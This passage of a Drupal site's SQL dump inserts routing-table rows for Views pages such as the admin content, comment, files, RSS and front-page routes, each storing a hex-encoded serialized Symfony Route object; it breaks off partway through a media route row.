('view.block_content.page_1', '/admin/content/block', '/admin/content/block', 7, 0x4f3a33313a2253796d666f6e795c436f6d706f6e656e745c526f7574696e675c526f757465223a393a7b733a343a2270617468223b733a32303a222f61646d696e2f636f6e74656e742f626c6f636b223b733a343a22686f7374223b733a303a22223b733a383a2264656661756c7473223b613a353a7b733a31313a225f636f6e74726f6c6c6572223b733a34373a2244727570616c5c76696577735c526f7574696e675c5669657750616765436f6e74726f6c6c65723a3a68616e646c65223b733a31353a225f7469746c655f63616c6c6261636b223b733a34393a2244727570616c5c76696577735c526f7574696e675c5669657750616765436f6e74726f6c6c65723a3a6765745469746c65223b733a373a22766965775f6964223b733a31333a22626c6f636b5f636f6e74656e74223b733a31303a22646973706c61795f6964223b733a363a22706167655f31223b733a33303a225f766965775f646973706c61795f73686f775f61646d696e5f6c696e6b73223b623a313b7d733a31323a22726571756972656d656e7473223b613a323a7b733a31313a225f7065726d697373696f6e223b733a32303a2261636365737320626c6f636b206c696272617279223b733a373a225f666f726d6174223b733a343a2268746d6c223b7d733a373a226f7074696f6e73223b613a393a7b733a31343a22636f6d70696c65725f636c617373223b733a33333a2244727570616c5c436f72655c526f7574696e675c526f757465436f6d70696c6572223b733a31383a225f766965775f617267756d656e745f6d6170223b613a303a7b7d733a32333a225f766965775f646973706c61795f706c7567696e5f6964223b733a343a2270616765223b733a32363a225f766965775f646973706c61795f706c7567696e5f636c617373223b733a33383a2244727570616c5c76696577735c506c7567696e5c76696577735c646973706c61795c50616765223b733a33303a225f766965775f646973706c61795f73686f775f61646d696e5f6c696e6b73223b623a313b733a31363a2272657475726e735f726573706f6e7365223b623a303b733a343a2275746638223b623a313b733a31323a225f61646d696e5f726f757465223b623a313b733a31343a225f6163636573735f636865636b73223b613a313a7b693a303b733a32333a226163636573735f636865636b2e7065726d697373696f6e223b7d7d733a373a22736368656d6573223b613a303a7b7d733a373a226d6574686f6473223b613a323a7b693a303b733a333a22474554223b693a313b733a343a22504f5354223b7d733a393a22636f6e646974696f6e223b733a303a22223b733a383a22636f6d70696c6564223b4f3a33333a2244727570616c5c436f72655c526f7574696e675c436f6d70696c6564526f757465223a31313a7b733a343a2276617273223b613a303a7b7d733a31313a22706174685f707265666978223b733a303a22223b733a31303a22706174685f7265676578223b733a32373a227b5e2f61646d696e2f636f6e74656e742f626c6f636b247d734475223b733a31313a22706174685f746f6b656e73223b613a313a7b693a303b613a323a7b693a303b733a343a2274657874223b693a313b733a32303a222f61646d696e2f636f6e74656e742f626c6f636b223b7d7d733a393a22706174685f76617273223b613a303a7b7d733a31303a22686f73745f7265676578223b4e3b733a31313a22686f73745f746f6b656e73223b613a303a7b7d733a393a22686f73745f76617273223b613a303a7b7d733a333a22666974223b693a373b733a31343a227061747465726e4f75746c696e65223b733a32303a222f61646d696e2f636f6e74656e742f626c6f636b223b733a383a226e756d5061727473223b693a333b7d7d, 3),
('view.comment.page_published', '/admin/content/comment', '/admin/content/comment', 7, 0x4f3a33313a2253796d666f6e795c436f6d706f6e656e745c526f7574696e675c526f757465223a393a7b733a343a2270617468223b733a32323a222f61646d696e2f636f6e74656e742f636f6d6d656e74223b733a343a22686f7374223b733a303a22223b733a383a2264656661756c7473223b613a353a7b733a31313a225f636f6e74726f6c6c6572223b733a34373a2244727570616c5c76696577735c526f7574696e675c5669657750616765436f6e74726f6c6c65723a3a68616e646c65223b733a31353a225f7469746c655f63616c6c6261636b223b733a34393a2244727570616c5c76696577735c526f7574696e675c5669657750616765436f6e74726f6c6c65723a3a6765745469746c65223b733a373a22766965775f6964223b733a373a22636f6d6d656e74223b733a31303a22646973706c61795f6964223b733a31343a22706167655f7075626c6973686564223b733a33303a225f766965775f646973706c61795f73686f775f61646d696e5f6c696e6b73223b623a313b7d733a31323a22726571756972656d656e7473223b613a323a7b733a31313a225f7065726d697373696f6e223b733a31393a2261646d696e697374657220636f6d6d656e7473223b733a373a225f666f726d6174223b733a343a2268746d6c223b7d733a373a226f7074696f6e73223b613a393a7b733a31343a22636f6d70696c65725f636c617373223b733a33333a2244727570616c5c436f72655c526f7574696e675c526f757465436f6d70696c6572223b733a31383a225f766965775f617267756d656e745f6d6170223b613a303a7b7d733a32333a225f766965775f646973706c61795f706c7567696e5f6964223b733a343a2270616765223b733a32363a225f766965775f646973706c61795f706c7567696e5f636c617373223b733a33383a2244727570616c5c76696577735c506c7567696e5c76696577735c646973706c61795c50616765223b733a33303a225f766965775f646973706c61795f73686f775f61646d696e5f6c696e6b73223b623a313b733a31363a2272657475726e735f726573706f6e7365223b623a303b733a343a2275746638223b623a313b733a31323a225f61646d696e5f726f757465223b623a313b733a31343a225f6163636573735f636865636b73223b613a313a7b693a303b733a32333a226163636573735f636865636b2e7065726d697373696f6e223b7d7d733a373a22736368656d6573223b613a303a7b7d733a373a226d6574686f6473223b613a323a7b693a303b733a333a22474554223b693a313b733a343a22504f5354223b7d733a393a22636f6e646974696f6e223b733a303a22223b733a383a22636f6d70696c6564223b4f3a33333a2244727570616c5c436f72655c526f7574696e675c436f6d70696c6564526f757465223a31313a7b733a343a2276617273223b613a303a7b7d733a31313a22706174685f707265666978223b733a303a22223b733a31303a22706174685f7265676578223b733a32393a227b5e2f61646d696e2f636f6e74656e742f636f6d6d656e74247d734475223b733a31313a22706174685f746f6b656e73223b613a313a7b693a303b613a323a7b693a303b733a343a2274657874223b693a313b733a32323a222f61646d696e2f636f6e74656e742f636f6d6d656e74223b7d7d733a393a22706174685f76617273223b613a303a7b7d733a31303a22686f73745f7265676578223b4e3b733a31313a22686f73745f746f6b656e73223b613a303a7b7d733a393a22686f73745f76617273223b613a303a7b7d733a333a22666974223b693a373b733a31343a227061747465726e4f75746c696e65223b733a32323a222f61646d696e2f636f6e74656e742f636f6d6d656e74223b733a383a226e756d5061727473223b693a333b7d7d, 3),
('view.comment.page_unapproved', '/admin/content/comment/approval', '/admin/content/comment/approval', 15, 0x4f3a33313a2253796d666f6e795c436f6d706f6e656e745c526f7574696e675c526f757465223a393a7b733a343a2270617468223b733a33313a222f61646d696e2f636f6e74656e742f636f6d6d656e742f617070726f76616c223b733a343a22686f7374223b733a303a22223b733a383a2264656661756c7473223b613a353a7b733a31313a225f636f6e74726f6c6c6572223b733a34373a2244727570616c5c76696577735c526f7574696e675c5669657750616765436f6e74726f6c6c65723a3a68616e646c65223b733a31353a225f7469746c655f63616c6c6261636b223b733a34393a2244727570616c5c76696577735c526f7574696e675c5669657750616765436f6e74726f6c6c65723a3a6765745469746c65223b733a373a22766965775f6964223b733a373a22636f6d6d656e74223b733a31303a22646973706c61795f6964223b733a31353a22706167655f756e617070726f766564223b733a33303a225f766965775f646973706c61795f73686f775f61646d696e5f6c696e6b73223b623a313b7d733a31323a22726571756972656d656e7473223b613a323a7b733a31313a225f7065726d697373696f6e223b733a31393a2261646d696e697374657220636f6d6d656e7473223b733a373a225f666f726d6174223b733a343a2268746d6c223b7d733a373a226f7074696f6e73223b613a393a7b733a31343a22636f6d70696c65725f636c617373223b733a33333a2244727570616c5c436f72655c526f7574696e675c526f757465436f6d70696c6572223b733a31383a225f766965775f617267756d656e745f6d6170223b613a303a7b7d733a32333a225f766965775f646973706c61795f706c7567696e5f6964223b733a343a2270616765223b733a32363a225f766965775f646973706c61795f706c7567696e5f636c617373223b733a33383a2244727570616c5c76696577735c506c7567696e5c76696577735c646973706c61795c50616765223b733a33303a225f766965775f646973706c61795f73686f775f61646d696e5f6c696e6b73223b623a313b733a31363a2272657475726e735f726573706f6e7365223b623a303b733a343a2275746638223b623a313b733a31323a225f61646d696e5f726f757465223b623a313b733a31343a225f6163636573735f636865636b73223b613a313a7b693a303b733a32333a226163636573735f636865636b2e7065726d697373696f6e223b7d7d733a373a22736368656d6573223b613a303a7b7d733a373a226d6574686f6473223b613a323a7b693a303b733a333a22474554223b693a313b733a343a22504f5354223b7d733a393a22636f6e646974696f6e223b733a303a22223b733a383a22636f6d70696c6564223b4f3a33333a2244727570616c5c436f72655c526f7574696e675c436f6d70696c6564526f757465223a31313a7b733a343a2276617273223b613a303a7b7d733a31313a22706174685f707265666978223b733a303a22223b733a31303a22706174685f7265676578223b733a33383a227b5e2f61646d696e2f636f6e74656e742f636f6d6d656e742f617070726f76616c247d734475223b733a31313a22706174685f746f6b656e73223b613a313a7b693a303b613a323a7b693a303b733a343a2274657874223b693a313b733a33313a222f61646d696e2f636f6e74656e742f636f6d6d656e742f617070726f76616c223b7d7d733a393a22706174685f76617273223b613a303a7b7d733a31303a22686f73745f7265676578223b4e3b733a31313a22686f73745f746f6b656e73223b613a303a7b7d733a393a22686f73745f76617273223b613a303a7b7d733a333a22666974223b693a31353b733a31343a227061747465726e4f75746c696e65223b733a33313a222f61646d696e2f636f6e74656e742f636f6d6d656e742f617070726f76616c223b733a383a226e756d5061727473223b693a343b7d7d, 4),
('view.content.page_1', '/admin/content', '/admin/content', 3, 0x4f3a33313a2253796d666f6e795c436f6d706f6e656e745c526f7574696e675c526f757465223a393a7b733a343a2270617468223b733a31343a222f61646d696e2f636f6e74656e74223b733a343a22686f7374223b733a303a22223b733a383a2264656661756c7473223b613a353a7b733a31313a225f636f6e74726f6c6c6572223b733a34373a2244727570616c5c76696577735c526f7574696e675c5669657750616765436f6e74726f6c6c65723a3a68616e646c65223b733a31353a225f7469746c655f63616c6c6261636b223b733a34393a2244727570616c5c76696577735c526f7574696e675c5669657750616765436f6e74726f6c6c65723a3a6765745469746c65223b733a373a22766965775f6964223b733a373a22636f6e74656e74223b733a31303a22646973706c61795f6964223b733a363a22706167655f31223b733a33303a225f766965775f646973706c61795f73686f775f61646d696e5f6c696e6b73223b623a303b7d733a31323a22726571756972656d656e7473223b613a323a7b733a31313a225f7065726d697373696f6e223b733a32333a2261636365737320636f6e74656e74206f76657276696577223b733a373a225f666f726d6174223b733a343a2268746d6c223b7d733a373a226f7074696f6e73223b613a393a7b733a31343a22636f6d70696c65725f636c617373223b733a33333a2244727570616c5c436f72655c526f7574696e675c526f757465436f6d70696c6572223b733a31383a225f766965775f617267756d656e745f6d6170223b613a303a7b7d733a32333a225f766965775f646973706c61795f706c7567696e5f6964223b733a343a2270616765223b733a32363a225f766965775f646973706c61795f706c7567696e5f636c617373223b733a33383a2244727570616c5c76696577735c506c7567696e5c76696577735c646973706c61795c50616765223b733a33303a225f766965775f646973706c61795f73686f775f61646d696e5f6c696e6b73223b623a303b733a31363a2272657475726e735f726573706f6e7365223b623a303b733a343a2275746638223b623a313b733a31323a225f61646d696e5f726f757465223b623a313b733a31343a225f6163636573735f636865636b73223b613a313a7b693a303b733a32333a226163636573735f636865636b2e7065726d697373696f6e223b7d7d733a373a22736368656d6573223b613a303a7b7d733a373a226d6574686f6473223b613a323a7b693a303b733a333a22474554223b693a313b733a343a22504f5354223b7d733a393a22636f6e646974696f6e223b733a303a22223b733a383a22636f6d70696c6564223b4f3a33333a2244727570616c5c436f72655c526f7574696e675c436f6d70696c6564526f757465223a31313a7b733a343a2276617273223b613a303a7b7d733a31313a22706174685f707265666978223b733a303a22223b733a31303a22706174685f7265676578223b733a32313a227b5e2f61646d696e2f636f6e74656e74247d734475223b733a31313a22706174685f746f6b656e73223b613a313a7b693a303b613a323a7b693a303b733a343a2274657874223b693a313b733a31343a222f61646d696e2f636f6e74656e74223b7d7d733a393a22706174685f76617273223b613a303a7b7d733a31303a22686f73745f7265676578223b4e3b733a31313a22686f73745f746f6b656e73223b613a303a7b7d733a393a22686f73745f76617273223b613a303a7b7d733a333a22666974223b693a333b733a31343a227061747465726e4f75746c696e65223b733a31343a222f61646d696e2f636f6e74656e74223b733a383a226e756d5061727473223b693a323b7d7d, 2),
('view.content_translations.page_1', '/translate/content', '/translate/content', 3, 0x4f3a33313a2253796d666f6e795c436f6d706f6e656e745c526f7574696e675c526f757465223a393a7b733a343a2270617468223b733a31383a222f7472616e736c6174652f636f6e74656e74223b733a343a22686f7374223b733a303a22223b733a383a2264656661756c7473223b613a353a7b733a31313a225f636f6e74726f6c6c6572223b733a34373a2244727570616c5c76696577735c526f7574696e675c5669657750616765436f6e74726f6c6c65723a3a68616e646c65223b733a31353a225f7469746c655f63616c6c6261636b223b733a34393a2244727570616c5c76696577735c526f7574696e675c5669657750616765436f6e74726f6c6c65723a3a6765745469746c65223b733a373a22766965775f6964223b733a32303a22636f6e74656e745f7472616e736c6174696f6e73223b733a31303a22646973706c61795f6964223b733a363a22706167655f31223b733a33303a225f766965775f646973706c61795f73686f775f61646d696e5f6c696e6b73223b623a313b7d733a31323a22726571756972656d656e7473223b613a323a7b733a31313a225f7065726d697373696f6e223b733a32373a2263726561746520636f6e74656e74207472616e736c6174696f6e73223b733a373a225f666f726d6174223b733a343a2268746d6c223b7d733a373a226f7074696f6e73223b613a383a7b733a31343a22636f6d70696c65725f636c617373223b733a33333a2244727570616c5c436f72655c526f7574696e675c526f757465436f6d70696c6572223b733a31383a225f766965775f617267756d656e745f6d6170223b613a303a7b7d733a32333a225f766965775f646973706c61795f706c7567696e5f6964223b733a343a2270616765223b733a32363a225f766965775f646973706c61795f706c7567696e5f636c617373223b733a33383a2244727570616c5c76696577735c506c7567696e5c76696577735c646973706c61795c50616765223b733a33303a225f766965775f646973706c61795f73686f775f61646d696e5f6c696e6b73223b623a313b733a31363a2272657475726e735f726573706f6e7365223b623a303b733a343a2275746638223b623a313b733a31343a225f6163636573735f636865636b73223b613a313a7b693a303b733a32333a226163636573735f636865636b2e7065726d697373696f6e223b7d7d733a373a22736368656d6573223b613a303a7b7d733a373a226d6574686f6473223b613a323a7b693a303b733a333a22474554223b693a313b733a343a22504f5354223b7d733a393a22636f6e646974696f6e223b733a303a22223b733a383a22636f6d70696c6564223b4f3a33333a2244727570616c5c436f72655c526f7574696e675c436f6d70696c6564526f757465223a31313a7b733a343a2276617273223b613a303a7b7d733a31313a22706174685f707265666978223b733a303a22223b733a31303a22706174685f7265676578223b733a32353a227b5e2f7472616e736c6174652f636f6e74656e74247d734475223b733a31313a22706174685f746f6b656e73223b613a313a7b693a303b613a323a7b693a303b733a343a2274657874223b693a313b733a31383a222f7472616e736c6174652f636f6e74656e74223b7d7d733a393a22706174685f76617273223b613a303a7b7d733a31303a22686f73745f7265676578223b4e3b733a31313a22686f73745f746f6b656e73223b613a303a7b7d733a393a22686f73745f76617273223b613a303a7b7d733a333a22666974223b693a333b733a31343a227061747465726e4f75746c696e65223b733a31383a222f7472616e736c6174652f636f6e74656e74223b733a383a226e756d5061727473223b693a323b7d7d, 2),
('view.files.page_1', '/admin/content/files', '/admin/content/files', 7, 0x4f3a33313a2253796d666f6e795c436f6d706f6e656e745c526f7574696e675c526f757465223a393a7b733a343a2270617468223b733a32303a222f61646d696e2f636f6e74656e742f66696c6573223b733a343a22686f7374223b733a303a22223b733a383a2264656661756c7473223b613a353a7b733a31313a225f636f6e74726f6c6c6572223b733a34373a2244727570616c5c76696577735c526f7574696e675c5669657750616765436f6e74726f6c6c65723a3a68616e646c65223b733a31353a225f7469746c655f63616c6c6261636b223b733a34393a2244727570616c5c76696577735c526f7574696e675c5669657750616765436f6e74726f6c6c65723a3a6765745469746c65223b733a373a22766965775f6964223b733a353a2266696c6573223b733a31303a22646973706c61795f6964223b733a363a22706167655f31223b733a33303a225f766965775f646973706c61795f73686f775f61646d696e5f6c696e6b73223b623a313b7d733a31323a22726571756972656d656e7473223b613a323a7b733a31313a225f7065726d697373696f6e223b733a32313a226163636573732066696c6573206f76657276696577223b733a373a225f666f726d6174223b733a343a2268746d6c223b7d733a373a226f7074696f6e73223b613a393a7b733a31343a22636f6d70696c65725f636c617373223b733a33333a2244727570616c5c436f72655c526f7574696e675c526f757465436f6d70696c6572223b733a31383a225f766965775f617267756d656e745f6d6170223b613a303a7b7d733a32333a225f766965775f646973706c61795f706c7567696e5f6964223b733a343a2270616765223b733a32363a225f766965775f646973706c61795f706c7567696e5f636c617373223b733a33383a2244727570616c5c76696577735c506c7567696e5c76696577735c646973706c61795c50616765223b733a33303a225f766965775f646973706c61795f73686f775f61646d696e5f6c696e6b73223b623a313b733a31363a2272657475726e735f726573706f6e7365223b623a303b733a343a2275746638223b623a313b733a31323a225f61646d696e5f726f757465223b623a313b733a31343a225f6163636573735f636865636b73223b613a313a7b693a303b733a32333a226163636573735f636865636b2e7065726d697373696f6e223b7d7d733a373a22736368656d6573223b613a303a7b7d733a373a226d6574686f6473223b613a323a7b693a303b733a333a22474554223b693a313b733a343a22504f5354223b7d733a393a22636f6e646974696f6e223b733a303a22223b733a383a22636f6d70696c6564223b4f3a33333a2244727570616c5c436f72655c526f7574696e675c436f6d70696c6564526f757465223a31313a7b733a343a2276617273223b613a303a7b7d733a31313a22706174685f707265666978223b733a303a22223b733a31303a22706174685f7265676578223b733a32373a227b5e2f61646d696e2f636f6e74656e742f66696c6573247d734475223b733a31313a22706174685f746f6b656e73223b613a313a7b693a303b613a323a7b693a303b733a343a2274657874223b693a313b733a32303a222f61646d696e2f636f6e74656e742f66696c6573223b7d7d733a393a22706174685f76617273223b613a303a7b7d733a31303a22686f73745f7265676578223b4e3b733a31313a22686f73745f746f6b656e73223b613a303a7b7d733a393a22686f73745f76617273223b613a303a7b7d733a333a22666974223b693a373b733a31343a227061747465726e4f75746c696e65223b733a32303a222f61646d696e2f636f6e74656e742f66696c6573223b733a383a226e756d5061727473223b693a333b7d7d, 3),
('view.files.page_2', '/admin/content/files/usage/{arg_0}', '/admin/content/files/usage/%', 30, 0x4f3a33313a2253796d666f6e795c436f6d706f6e656e745c526f7574696e675c526f757465223a393a7b733a343a2270617468223b733a33343a222f61646d696e2f636f6e74656e742f66696c65732f75736167652f7b6172675f307d223b733a343a22686f7374223b733a303a22223b733a383a2264656661756c7473223b613a353a7b733a31313a225f636f6e74726f6c6c6572223b733a34373a2244727570616c5c76696577735c526f7574696e675c5669657750616765436f6e74726f6c6c65723a3a68616e646c65223b733a31353a225f7469746c655f63616c6c6261636b223b733a34393a2244727570616c5c76696577735c526f7574696e675c5669657750616765436f6e74726f6c6c65723a3a6765745469746c65223b733a373a22766965775f6964223b733a353a2266696c6573223b733a31303a22646973706c61795f6964223b733a363a22706167655f32223b733a33303a225f766965775f646973706c61795f73686f775f61646d696e5f6c696e6b73223b623a313b7d733a31323a22726571756972656d656e7473223b613a323a7b733a31313a225f7065726d697373696f6e223b733a32313a226163636573732066696c6573206f76657276696577223b733a373a225f666f726d6174223b733a343a2268746d6c223b7d733a373a226f7074696f6e73223b613a393a7b733a31343a22636f6d70696c65725f636c617373223b733a33333a2244727570616c5c436f72655c526f7574696e675c526f757465436f6d70696c6572223b733a31383a225f766965775f617267756d656e745f6d6170223b613a313a7b733a353a226172675f30223b733a353a226172675f30223b7d733a32333a225f766965775f646973706c61795f706c7567696e5f6964223b733a343a2270616765223b733a32363a225f766965775f646973706c61795f706c7567696e5f636c617373223b733a33383a2244727570616c5c76696577735c506c7567696e5c76696577735c646973706c61795c50616765223b733a33303a225f766965775f646973706c61795f73686f775f61646d696e5f6c696e6b73223b623a313b733a31363a2272657475726e735f726573706f6e7365223b623a303b733a343a2275746638223b623a313b733a31323a225f61646d696e5f726f757465223b623a313b733a31343a225f6163636573735f636865636b73223b613a313a7b693a303b733a32333a226163636573735f636865636b2e7065726d697373696f6e223b7d7d733a373a22736368656d6573223b613a303a7b7d733a373a226d6574686f6473223b613a323a7b693a303b733a333a22474554223b693a313b733a343a22504f5354223b7d733a393a22636f6e646974696f6e223b733a303a22223b733a383a22636f6d70696c6564223b4f3a33333a2244727570616c5c436f72655c526f7574696e675c436f6d70696c6564526f757465223a31313a7b733a343a2276617273223b613a313a7b693a303b733a353a226172675f30223b7d733a31313a22706174685f707265666978223b733a303a22223b733a31303a22706174685f7265676578223b733a35313a227b5e2f61646d696e2f636f6e74656e742f66696c65732f75736167652f283f503c6172675f303e5b5e2f5d2b2b29247d734475223b733a31313a22706174685f746f6b656e73223b613a323a7b693a303b613a353a7b693a303b733a383a227661726961626c65223b693a313b733a313a222f223b693a323b733a363a225b5e2f5d2b2b223b693a333b733a353a226172675f30223b693a343b623a313b7d693a313b613a323a7b693a303b733a343a2274657874223b693a313b733a32363a222f61646d696e2f636f6e74656e742f66696c65732f7573616765223b7d7d733a393a22706174685f76617273223b613a313a7b693a303b733a353a226172675f30223b7d733a31303a22686f73745f7265676578223b4e3b733a31313a22686f73745f746f6b656e73223b613a303a7b7d733a393a22686f73745f76617273223b613a303a7b7d733a333a22666974223b693a33303b733a31343a227061747465726e4f75746c696e65223b733a32383a222f61646d696e2f636f6e74656e742f66696c65732f75736167652f25223b733a383a226e756d5061727473223b693a353b7d7d, 5),
('view.frontpage.feed_1', '/rss.xml', '/rss.xml', 1, 0x4f3a33313a2253796d666f6e795c436f6d706f6e656e745c526f7574696e675c526f757465223a393a7b733a343a2270617468223b733a383a222f7273732e786d6c223b733a343a22686f7374223b733a303a22223b733a383a2264656661756c7473223b613a353a7b733a31313a225f636f6e74726f6c6c6572223b733a34373a2244727570616c5c76696577735c526f7574696e675c5669657750616765436f6e74726f6c6c65723a3a68616e646c65223b733a31353a225f7469746c655f63616c6c6261636b223b733a34393a2244727570616c5c76696577735c526f7574696e675c5669657750616765436f6e74726f6c6c65723a3a6765745469746c65223b733a373a22766965775f6964223b733a393a2266726f6e7470616765223b733a31303a22646973706c61795f6964223b733a363a22666565645f31223b733a33303a225f766965775f646973706c61795f73686f775f61646d696e5f6c696e6b73223b623a313b7d733a31323a22726571756972656d656e7473223b613a313a7b733a31313a225f7065726d697373696f6e223b733a31343a2261636365737320636f6e74656e74223b7d733a373a226f7074696f6e73223b613a383a7b733a31343a22636f6d70696c65725f636c617373223b733a33333a2244727570616c5c436f72655c526f7574696e675c526f757465436f6d70696c6572223b733a31383a225f766965775f617267756d656e745f6d6170223b613a303a7b7d733a32333a225f766965775f646973706c61795f706c7567696e5f6964223b733a343a2266656564223b733a32363a225f766965775f646973706c61795f706c7567696e5f636c617373223b733a33383a2244727570616c5c76696577735c506c7567696e5c76696577735c646973706c61795c46656564223b733a33303a225f766965775f646973706c61795f73686f775f61646d696e5f6c696e6b73223b623a313b733a31363a2272657475726e735f726573706f6e7365223b623a313b733a343a2275746638223b623a313b733a31343a225f6163636573735f636865636b73223b613a313a7b693a303b733a32333a226163636573735f636865636b2e7065726d697373696f6e223b7d7d733a373a22736368656d6573223b613a303a7b7d733a373a226d6574686f6473223b613a323a7b693a303b733a333a22474554223b693a313b733a343a22504f5354223b7d733a393a22636f6e646974696f6e223b733a303a22223b733a383a22636f6d70696c6564223b4f3a33333a2244727570616c5c436f72655c526f7574696e675c436f6d70696c6564526f757465223a31313a7b733a343a2276617273223b613a303a7b7d733a31313a22706174685f707265666978223b733a303a22223b733a31303a22706174685f7265676578223b733a31363a227b5e2f7273735c2e786d6c247d734475223b733a31313a22706174685f746f6b656e73223b613a313a7b693a303b613a323a7b693a303b733a343a2274657874223b693a313b733a383a222f7273732e786d6c223b7d7d733a393a22706174685f76617273223b613a303a7b7d733a31303a22686f73745f7265676578223b4e3b733a31313a22686f73745f746f6b656e73223b613a303a7b7d733a393a22686f73745f76617273223b613a303a7b7d733a333a22666974223b693a313b733a31343a227061747465726e4f75746c696e65223b733a383a222f7273732e786d6c223b733a383a226e756d5061727473223b693a313b7d7d, 1),
('view.frontpage.page_1', '/node', '/node', 1, 0x4f3a33313a2253796d666f6e795c436f6d706f6e656e745c526f7574696e675c526f757465223a393a7b733a343a2270617468223b733a353a222f6e6f6465223b733a343a22686f7374223b733a303a22223b733a383a2264656661756c7473223b613a353a7b733a31313a225f636f6e74726f6c6c6572223b733a34373a2244727570616c5c76696577735c526f7574696e675c5669657750616765436f6e74726f6c6c65723a3a68616e646c65223b733a31353a225f7469746c655f63616c6c6261636b223b733a34393a2244727570616c5c76696577735c526f7574696e675c5669657750616765436f6e74726f6c6c65723a3a6765745469746c65223b733a373a22766965775f6964223b733a393a2266726f6e7470616765223b733a31303a22646973706c61795f6964223b733a363a22706167655f31223b733a33303a225f766965775f646973706c61795f73686f775f61646d696e5f6c696e6b73223b623a313b7d733a31323a22726571756972656d656e7473223b613a323a7b733a31313a225f7065726d697373696f6e223b733a31343a2261636365737320636f6e74656e74223b733a373a225f666f726d6174223b733a343a2268746d6c223b7d733a373a226f7074696f6e73223b613a383a7b733a31343a22636f6d70696c65725f636c617373223b733a33333a2244727570616c5c436f72655c526f7574696e675c526f757465436f6d70696c6572223b733a31383a225f766965775f617267756d656e745f6d6170223b613a303a7b7d733a32333a225f766965775f646973706c61795f706c7567696e5f6964223b733a343a2270616765223b733a32363a225f766965775f646973706c61795f706c7567696e5f636c617373223b733a33383a2244727570616c5c76696577735c506c7567696e5c76696577735c646973706c61795c50616765223b733a33303a225f766965775f646973706c61795f73686f775f61646d696e5f6c696e6b73223b623a313b733a31363a2272657475726e735f726573706f6e7365223b623a303b733a343a2275746638223b623a313b733a31343a225f6163636573735f636865636b73223b613a313a7b693a303b733a32333a226163636573735f636865636b2e7065726d697373696f6e223b7d7d733a373a22736368656d6573223b613a303a7b7d733a373a226d6574686f6473223b613a323a7b693a303b733a333a22474554223b693a313b733a343a22504f5354223b7d733a393a22636f6e646974696f6e223b733a303a22223b733a383a22636f6d70696c6564223b4f3a33333a2244727570616c5c436f72655c526f7574696e675c436f6d70696c6564526f757465223a31313a7b733a343a2276617273223b613a303a7b7d733a31313a22706174685f707265666978223b733a303a22223b733a31303a22706174685f7265676578223b733a31323a227b5e2f6e6f6465247d734475223b733a31313a22706174685f746f6b656e73223b613a313a7b693a303b613a323a7b693a303b733a343a2274657874223b693a313b733a353a222f6e6f6465223b7d7d733a393a22706174685f76617273223b613a303a7b7d733a31303a22686f73745f7265676578223b4e3b733a31313a22686f73745f746f6b656e73223b613a303a7b7d733a393a22686f73745f76617273223b613a303a7b7d733a333a22666974223b693a313b733a31343a227061747465726e4f75746c696e65223b733a353a222f6e6f6465223b733a383a226e756d5061727473223b693a313b7d7d, 1);
INSERT INTO `router` (`name`, `path`, `pattern_outline`, `fit`, `route`, `number_parts`) VALUES
('view.language_center.page_1', '/language-center', '/language-center', 1, 0x4f3a33313a2253796d666f6e795c436f6d706f6e656e745c526f7574696e675c526f757465223a393a7b733a343a2270617468223b733a31363a222f6c616e67756167652d63656e746572223b733a343a22686f7374223b733a303a22223b733a383a2264656661756c7473223b613a353a7b733a31313a225f636f6e74726f6c6c6572223b733a34373a2244727570616c5c76696577735c526f7574696e675c5669657750616765436f6e74726f6c6c65723a3a68616e646c65223b733a31353a225f7469746c655f63616c6c6261636b223b733a34393a2244727570616c5c76696577735c526f7574696e675c5669657750616765436f6e74726f6c6c65723a3a6765745469746c65223b733a373a22766965775f6964223b733a31353a226c616e67756167655f63656e746572223b733a31303a22646973706c61795f6964223b733a363a22706167655f31223b733a33303a225f766965775f646973706c61795f73686f775f61646d696e5f6c696e6b73223b623a313b7d733a31323a22726571756972656d656e7473223b613a323a7b733a31313a225f7065726d697373696f6e223b733a31343a2261636365737320636f6e74656e74223b733a373a225f666f726d6174223b733a343a2268746d6c223b7d733a373a226f7074696f6e73223b613a383a7b733a31343a22636f6d70696c65725f636c617373223b733a33333a2244727570616c5c436f72655c526f7574696e675c526f757465436f6d70696c6572223b733a31383a225f766965775f617267756d656e745f6d6170223b613a303a7b7d733a32333a225f766965775f646973706c61795f706c7567696e5f6964223b733a343a2270616765223b733a32363a225f766965775f646973706c61795f706c7567696e5f636c617373223b733a33383a2244727570616c5c76696577735c506c7567696e5c76696577735c646973706c61795c50616765223b733a33303a225f766965775f646973706c61795f73686f775f61646d696e5f6c696e6b73223b623a313b733a31363a2272657475726e735f726573706f6e7365223b623a303b733a343a2275746638223b623a313b733a31343a225f6163636573735f636865636b73223b613a313a7b693a303b733a32333a226163636573735f636865636b2e7065726d697373696f6e223b7d7d733a373a22736368656d6573223b613a303a7b7d733a373a226d6574686f6473223b613a323a7b693a303b733a333a22474554223b693a313b733a343a22504f5354223b7d733a393a22636f6e646974696f6e223b733a303a22223b733a383a22636f6d70696c6564223b4f3a33333a2244727570616c5c436f72655c526f7574696e675c436f6d70696c6564526f757465223a31313a7b733a343a2276617273223b613a303a7b7d733a31313a22706174685f707265666978223b733a303a22223b733a31303a22706174685f7265676578223b733a32343a227b5e2f6c616e67756167655c2d63656e746572247d734475223b733a31313a22706174685f746f6b656e73223b613a313a7b693a303b613a323a7b693a303b733a343a2274657874223b693a313b733a31363a222f6c616e67756167652d63656e746572223b7d7d733a393a22706174685f76617273223b613a303a7b7d733a31303a22686f73745f7265676578223b4e3b733a31313a22686f73745f746f6b656e73223b613a303a7b7d733a393a22686f73745f76617273223b613a303a7b7d733a333a22666974223b693a313b733a31343a227061747465726e4f75746c696e65223b733a31363a222f6c616e67756167652d63656e746572223b733a383a226e756d5061727473223b693a313b7d7d, 1),
('view.media.media_page_list', '/admin/content/media', '/admin/content/media', 7, 